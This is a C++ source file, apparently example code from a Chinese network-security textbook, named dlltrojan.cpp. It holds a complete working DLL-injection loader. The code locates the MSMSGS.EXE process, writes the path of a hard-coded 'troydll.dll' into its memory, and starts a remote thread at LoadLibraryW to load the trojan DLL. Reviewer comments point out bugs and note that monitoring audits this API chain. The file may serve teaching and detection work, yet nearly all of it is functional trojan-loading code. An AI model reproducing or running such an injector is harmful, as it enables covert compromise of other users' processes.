📄 dlltrojan.cpp

📁 “网络安全技术实践与代码详解”实例代码
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <Tlhelp32.h>

void CheckError ( int, int, char *); // error handler: prints a message, releases the file-scope handles below and exits
HANDLE hRemoteThread, hRemoteProcess; // remote thread / process handles; file-scope (zero-initialized) so CheckError can release them
PWSTR pszLibFileRemote=NULL; // address of the DLL path inside the remote process; NULL until VirtualAllocEx succeeds
// Look up a process ID by executable name (case-sensitive strcmp against pe32.szExeFile).
// Returns the th32ProcessID of the first matching entry found after the snapshot's first
// process, or 0 (FALSE) when the snapshot cannot be created.
// NOTE(review): processID is never given a default, so when no process matches the function
// returns an indeterminate value (undefined behavior) instead of 0; main() passes that value
// straight to OpenProcess without validating it.
DWORD   GetProcessIdFromName(char *processname)   
{   
    
	HANDLE  hProcessSnap   =   NULL;     
	BOOL  bRet             =   FALSE;     // unused
	PROCESSENTRY32   pe32  =   {0};     
	DWORD   processID; // PID of the matching entry (no default; see NOTE above)
	// Snapshot every process on the system
	hProcessSnap  =  CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,   0);     
	if   (hProcessSnap   ==   INVALID_HANDLE_VALUE)
	{
		return FALSE;
	}
	pe32.dwSize   =   sizeof(PROCESSENTRY32);     
    // Position on the first entry, then walk the remaining ones
	if  (Process32First(hProcessSnap, &pe32))
	{       
		HANDLE   hProcess;
		// NOTE(review): the entry filled in by Process32First is never compared;
		// the comparison loop starts at the second entry of the snapshot.
		while   (Process32Next(hProcessSnap,   &pe32))
		{   
			// Executable name matches (strcmp on szExeFile presumes an ANSI, non-UNICODE build)
			if (!strcmp(pe32.szExeFile,processname))
			{   
				// The process is opened and immediately closed; the handle is not checked and
				// the outcome has no effect on the returned value.
				hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);   
				CloseHandle(hProcess);
				// Record the PID and stop scanning
				processID = pe32.th32ProcessID;   
				break;   
			}   
		}   
	}   
	CloseHandle   (hProcessSnap);     
	return   processID; 
} 


// Entry point: loads the hard-coded DLL d:\troydll.dll into the process named
// MSMSGS.EXE by writing the DLL path into that process's memory and starting a
// remote thread at LoadLibraryW. argc/argv are not used; target name and DLL path
// are fixed in the code below.
// NOTE(review): `void main` is non-standard; both C and C++ require `int main`.
// The OpenProcess(PROCESS_VM_WRITE) -> VirtualAllocEx -> WriteProcessMemory ->
// CreateRemoteThread sequence performed here is the API chain that host-based
// monitoring commonly audits for cross-process code loading.
void main(int argc,char **argv)

{

	int iReturnCode; // result of the most recent Win32 call, checked via CheckError
	
	char lpDllFullPathName[MAX_PATH]; // ANSI path of the DLL to load
	
	WCHAR pszLibFileName[MAX_PATH]={0}; // zero-filled so the UTF-16 copy below ends up NUL-terminated
	// Resolve the PID of MSMSGS.EXE.
	// NOTE(review): GetProcessIdFromName returns an indeterminate value when no such
	// process exists; the result is not validated before it reaches OpenProcess.
	DWORD dwRemoteProcessId = GetProcessIdFromName("MSMSGS.EXE"); 
	
	strcpy(lpDllFullPathName, "d:\\troydll.dll"); // literal is far shorter than MAX_PATH
	
	// Convert the ANSI path to UTF-16. strlen() excludes the terminator, so
	// termination of pszLibFileName relies on the zero-initialization above.
	// Returns 0 on failure, which CheckError treats as the error value.
	
	iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
		
		lpDllFullPathName, strlen(lpDllFullPathName),
		
		pszLibFileName, MAX_PATH);
	
	CheckError(iReturnCode, 0, "MultByteToWideChar"); // message misspells the API name
	
	// Open the target process with only the rights the steps below need
	
	hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | // to call CreateRemoteThread
		
		PROCESS_VM_OPERATION | // to call VirtualAllocEx / VirtualFreeEx
		
		PROCESS_VM_WRITE, // to call WriteProcessMemory
		
		FALSE, dwRemoteProcessId ); 
	
	// NOTE(review): HANDLE is pointer-sized; casting it to int truncates on 64-bit builds.
	CheckError( (int) hRemoteProcess, NULL, "Remote Process not Exist or Access Denied!");
	
	// Bytes needed for the path in the remote process, including the NUL terminator
	
	int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
	
	pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, 
		NULL, 
		cb, 
		MEM_COMMIT, 
		PAGE_READWRITE);
	
	CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx"); // same pointer-to-int truncation caveat as above
	
	// Copy the UTF-16 path into the remote allocation; the bytes-written count is not requested (NULL)
	
	iReturnCode = WriteProcessMemory(hRemoteProcess, 
		pszLibFileRemote, 
		(PVOID) pszLibFileName, 
		cb, 
		NULL);
	
	CheckError(iReturnCode, false, "WriteProcessMemory");
	
	// Resolve LoadLibraryW in this process's kernel32 mapping; the same address is
	// then used as the remote thread's start routine (presumed valid in the target).
	
	PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
		
		GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
	
	CheckError((int)pfnStartAddr, NULL, "GetProcAddress");
	
	// Start a thread in the target at LoadLibraryW with the remote path as its argument
	
	hRemoteThread = CreateRemoteThread( hRemoteProcess, 
		NULL, 
		0, 
		pfnStartAddr, 
		pszLibFileRemote, 
		0, NULL);
	
	CheckError((int)hRemoteThread, NULL, "Create Remote Thread");
	
	// Block until the remote thread exits; INFINITE means this never times out
	
	WaitForSingleObject(hRemoteThread, INFINITE);
	
	// Release the remote allocation and both handles (same sequence CheckError runs on failure)
	
	if (pszLibFileRemote != NULL)
		
	{
		
		VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
		
	}
	
	if (hRemoteThread != NULL) 
		
	{
		
		CloseHandle(hRemoteThread );
		
	}
	
	if (hRemoteProcess!= NULL) 
		
	{
		
		CloseHandle(hRemoteProcess);
		
	}

}

// Error handler. If iReturnCode equals iErrorCode (the failure value of the call just
// made -- every caller passes 0/NULL/false), print pErrorMsg together with GetLastError(),
// release the file-scope remote resources and terminate the process. Otherwise a no-op.
// GetLastError() is evaluated as a printf argument, i.e. before printf itself runs, so
// the code is read before any other call can overwrite it.
// NOTE(review): exit(0) reports success to the caller even though an error occurred;
// a nonzero status would be the conventional way to signal failure.

void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)

{

	if(iReturnCode==iErrorCode)
		
	{
		
		printf("%s Error:%d\n\n", pErrorMsg, GetLastError());
		
		// Cleanup: mirrors the release sequence at the end of main()
		
		if (pszLibFileRemote != NULL) // set only after a successful VirtualAllocEx
			
		{
			
			VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
			
		}
		
		if (hRemoteThread != NULL) 
			
		{
			
			CloseHandle(hRemoteThread );
			
		}
		
		if (hRemoteProcess!= NULL)
			
		{
			
			CloseHandle(hRemoteProcess);
			
		}
		
		exit(0);
		
	}

}
